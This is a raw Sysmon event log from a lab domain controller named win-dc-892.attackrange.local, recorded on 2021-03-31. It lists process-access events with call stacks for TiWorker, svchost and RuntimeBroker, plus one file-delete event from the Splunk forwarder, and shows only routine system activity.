10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.745{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.729{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.714{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.698{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.683{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.683{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71E71E0EE68229607E5B7756414B049,SHA256=B7FA68525D27A5C7BB62C19804F7EB60CB67DB32C9461EF33D5E8884D9A6B2D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.667{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.667{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.667{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.667{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.636{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 